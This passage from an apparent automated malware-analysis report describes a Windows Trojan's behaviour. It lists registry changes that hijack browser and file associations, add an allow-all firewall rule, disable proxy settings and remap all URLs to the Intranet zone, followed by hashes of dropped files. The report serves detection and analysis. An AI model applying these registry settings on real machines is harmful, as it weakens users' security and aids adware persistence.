[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The Trojan deletes the following value(s) in system registry:
The Trojan disables automatic startup of the application by deleting the following autorun value:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ethminer"
The process nsf7.tmp:644 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AE 65 11 C9 F4 CE 7D 97 76 89 2B EB AA 99 23 56"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Services\NlaSvc]
"CMPK" = "-obi-imi-tot-mdh-cpm-opw-crb-crr"
The process nst13.tmp:444 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0F 38 1A 96 64 21 41 21 44 A2 89 6E 14 9F BC E5"
[HKLM\SOFTWARE\Crossbrowse]
"Preinstall" = "1"
[HKCU\Software\Crossbrowse]
"Preinstall" = "1"
The process setup.exe:700 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Crossbrowse]
"VersionMajor" = "2171"
"NoRepair" = "1"
[HKCU\Software\Classes\ftp\shell]
"(Default)" = "open"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\URLAssociations]
"webcal" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr1F.tmp\registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr1F.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh22.tmp\registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh22.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz27.tmp\nsProcess.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz27.tmp\registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz27.tmp\, , \??\%Program Files%\Crossbrowse\Crossbrowse,"
[HKCR\ftp\shell\open\command]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe -- %1"
[HKCR\https\shell\open\command]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe -- %1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Crossbrowse\Installer]
"InstallerSuccessLaunchCmdLine" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\FileAssociations]
".html" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\URLAssociations]
"ftp" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\InstallInfo]
"HideIconsCommand" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe --hide-icons"
"ReinstallCommand" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe --make-default-browser"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities]
"ApplicationDescription" = "Crossbrowse is a web browser that runs webpages and applications with lightning speed. It's fast, stable, and easy to use. Browse the web more safely with malware and phishing protection built into Crossbrowse."
[HKLM\SOFTWARE\Crossbrowse\Installer]
"UninstallArguments" = " --uninstall --system-level"
[HKCR\.html\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Crossbrowse\Installer]
"InstallerExtraCode1" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKCU\Software\Classes\http\shell\open\ddeexec]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"StubPath" = "%Program Files%\Crossbrowse\Crossbrowse\Application\39.6.2171.95\Installer\chrmstp.exe --configure-user-settings --verbose-logging --system-level"
[HKCR\.html]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\ftp]
"URL Protocol" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\InstallInfo]
"IconsVisible" = "1"
[HKLM\SOFTWARE\Crossbrowse\Installer]
"oopcrashes" = "1"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\URLAssociations]
"sms" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities]
"ApplicationName" = "Crossbrowse"
[HKLM\SOFTWARE\Crossbrowse\Installer]
"InstallerError" = "0"
[HKCU\Software\Classes\.xht]
"(Default)" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\shell\open\command]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities]
"ApplicationIcon" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe,0"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\FileAssociations]
".xht" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Crossbrowse]
"DisplayVersion" = "39.6.2171.95"
[HKCU\Software\Classes\.html]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\ftp\DefaultIcon]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe,0"
[HKCU\Software\Classes\.shtml]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\https\shell\open\ddeexec]
"(Default)" = ""
[HKCR\CLSID\{2A563926-CF4B-4363-A760-F71E46205B7E}\LocalServer32]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\39.6.2171.95\delegate_execute.exe"
[HKLM\SOFTWARE\Crossbrowse\Installer]
"ap" = "-stage:preconditions"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Crossbrowse]
"InstallLocation" = "%Program Files%\Crossbrowse\Crossbrowse\Application"
[HKCR\ftp\DefaultIcon]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe,0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"IsInstalled" = "1"
"Version" = "24,0,0,0"
[HKCR\https\shell]
"(Default)" = "open"
[HKCR\.xhtml]
"(Default)" = "CRSBRWSHTML"
[HKCR\.xht\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKCR\ftp\shell\open\ddeexec]
"(Default)" = ""
[HKCU\Software\Classes\http\DefaultIcon]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe,0"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\URLAssociations]
"nntp" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Classes\ftp\shell\open\command]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe -- %1"
[HKCR\ftp]
"URL Protocol" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKLM\SOFTWARE\Crossbrowse\Installer]
"UninstallString" = "%Program Files%\Crossbrowse\Crossbrowse\Application\39.6.2171.95\Installer\setup.exe"
[HKCR\HTTP\shell\open\ddeexec]
"(Default)" = ""
[HKCR\https\shell\open\ddeexec]
"(Default)" = ""
[HKCR\CRSBRWSHTML\DefaultIcon]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe,0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Crossbrowse]
"DisplayName" = "Crossbrowse"
"UninstallString" = "%Program Files%\Crossbrowse\Crossbrowse\Application\39.6.2171.95\Installer\setup.exe --uninstall --system-level"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\URLAssociations]
"smsto" = "CRSBRWSHTML"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Classes\https\DefaultIcon]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe,0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Crossbrowse]
"Version" = "39.6.2171.95"
[HKCR\https\DefaultIcon]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe,0"
[HKCR\CRSBRWSHTML\shell\open\command]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe -- %1"
[HKCR\.shtml\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKCU\Software\Classes\https\shell]
"(Default)" = "open"
[HKCR\.webp\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\FileAssociations]
".htm" = "CRSBRWSHTML"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\Startmenu]
"StartMenuInternet" = "Crossbrowse"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\URLAssociations]
"urn" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\FileAssociations]
".shtml" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\URLAssociations]
"tel" = "CRSBRWSHTML"
"irc" = "CRSBRWSHTML"
[HKCU\Software\Classes\http\shell]
"(Default)" = "open"
[HKCR\HTTP\shell]
"(Default)" = "open"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Crossbrowse]
"Publisher" = "The Crossbrowse Authors"
[HKCU\Software\Classes\http]
"URL Protocol" = ""
[HKCR\.shtml]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\https]
"URL Protocol" = ""
[HKCR\.htm\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DA E2 BF CA F7 DA FC 16 CE D5 90 DC 45 9F 54 61"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\URLAssociations]
"https" = "CRSBRWSHTML"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"(Default)" = "Crossbrowse"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCR\HTTP\DefaultIcon]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe,0"
[HKCU\Software\Classes\.htm]
"(Default)" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Crossbrowse]
"DisplayIcon" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe,0"
[HKCR\https]
"URL Protocol" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Crossbrowse\Installer]
"pv" = "39.6.2171.95"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Crossbrowse]
"InstallDate" = "20151106"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\InstallInfo]
"ShowIconsCommand" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe --show-icons"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\URLAssociations]
"mms" = "CRSBRWSHTML"
[HKCR\.htm]
"(Default)" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\crossbrowse.exe]
"Path" = "%Program Files%\Crossbrowse\Crossbrowse\Application"
[HKCR\HTTP]
"URL Protocol" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse]
"(Default)" = "Crossbrowse"
[HKCU\Software\Classes\ftp\shell\open\ddeexec]
"(Default)" = ""
[HKCR\CLSID\{2A563926-CF4B-4363-A760-F71E46205B7E}]
"(Default)" = "CommandExecuteImpl Class"
[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"Localized Name" = "Crossbrowse"
[HKLM\SOFTWARE\Clients\StartMenuInternet]
"(Default)" = "Crossbrowse"
[HKCR\CRSBRWSHTML]
"(Default)" = "Crossbrowse HTML Document"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\URLAssociations]
"http" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Crossbrowse\Installer]
"Name" = "Crossbrowse"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\URLAssociations]
"mailto" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\FileAssociations]
".xhtml" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Crossbrowse]
"VersionMinor" = "95"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Crossbrowse]
"NoModify" = "1"
[HKLM\SOFTWARE\RegisteredApplications]
"Crossbrowse" = "Software\Clients\StartMenuInternet\Crossbrowse\Capabilities"
[HKCU\Software\Classes\.xhtml]
"(Default)" = "CRSBRWSHTML"
[HKCR\ftp\shell]
"(Default)" = "open"
[HKCR\.xhtml\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\DefaultIcon]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe,0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKCR\.xht]
"(Default)" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\URLAssociations]
"news" = "CRSBRWSHTML"
[HKCR\HTTP\shell\open\command]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe -- %1"
[HKCR\CLSID\{2A563926-CF4B-4363-A760-F71E46205B7E}\LocalServer32]
"ServerExecutable" = "%Program Files%\Crossbrowse\Crossbrowse\Application\39.6.2171.95\delegate_execute.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\crossbrowse.exe]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe"
[HKLM\SOFTWARE\Crossbrowse\Installer]
"InstallerResult" = "0"
[HKCU\Software\Clients\StartmenuInternet]
"(Default)" = "Crossbrowse"
[HKCU\Software\Classes\https\shell\open\command]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe -- %1"
[HKCU\Software\Classes\http\shell\open\command]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe -- %1"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\FileAssociations]
".webp" = "CRSBRWSHTML"
Adds a rule to the firewall Windows which allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\Crossbrowse\Crossbrowse\Application]
"crossbrowse.exe" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe:*:Enabled:Crossbrowse"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Crossbrowse\Installer]
"ap"
"InstallerExtraCode1"
The process %original file name%.exe:468 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VOPackage]
"isnw" = "7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ASPackage]
"isnw" = "7"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\APPackage]
"isnw" = "7"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "64 43 38 1C 63 38 0D 0F A6 83 E1 54 01 7D 63 1F"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YSPackage]
"isnw" = "7"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsmB.tmp:640 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "78 F9 1C 5E 9F 29 9A 65 19 9A A5 B7 59 B8 DC 03"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process amisid.exe:444 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
"CategoryCount" = "16"
[HKCU\Software\InternetTurbo]
"UID" = "6FE5DDD064E91F40D31A83BB9FE8886E"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "06 60 4A 43 40 E6 9D 19 88 8A B7 65 64 7C C1 7A"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisid\DEBUG]
"Trace Level" = ""
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisid\DEBUG]
"Trace Level"
Dropped PE files
MD5 | File path |
---|---|
de36bf8875ae7354dee15db775eb671d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\5185\setup.exe |
ea76c784fe08389a29306940372ac66a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\9035.exe |
2a5f246b97d00f77b78d15f72923839b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Uninstall.exe |
2b7007ed0262ca02ef69d8990815cbeb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsh22.tmp\registry.dll |
3eff59fc48dd082035f2c09e2d45b0f8 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsq1C.tmp |
2b7007ed0262ca02ef69d8990815cbeb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsr1F.tmp\registry.dll |
f02155fa3e59a8fc48a74a236b2bb42e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst3.tmp\inetc.dll |
7b95322ce4962d0df08819c8ce04f5f4 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsxE.tmp |
c8fa1fa3b18a3433cc051fc1dc8e4382 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsz27.tmp\nsProcess.dll |
2b7007ed0262ca02ef69d8990815cbeb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsz27.tmp\registry.dll |
63cf70a88c53c93d23d322ae60e5ba51 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsz2A.tmp |
798e76757d49d72f41b8eebe1e77a852 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\7121923af824073a25b2b7e6ba0a6e0e[1].exe |
3eff59fc48dd082035f2c09e2d45b0f8 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\Bundle_OperaRUnew[1].exe |
63cf70a88c53c93d23d322ae60e5ba51 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\CZPOAqqx9[1] |
5940a60b403721e5a8739be2e44d3c4b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\bseLbpD9T[1].exe |
ea76c784fe08389a29306940372ac66a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\installer[1].exe |
7c80d3e37e8cf5974ca149fde9f1ec6d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\Cdn[1].exe |
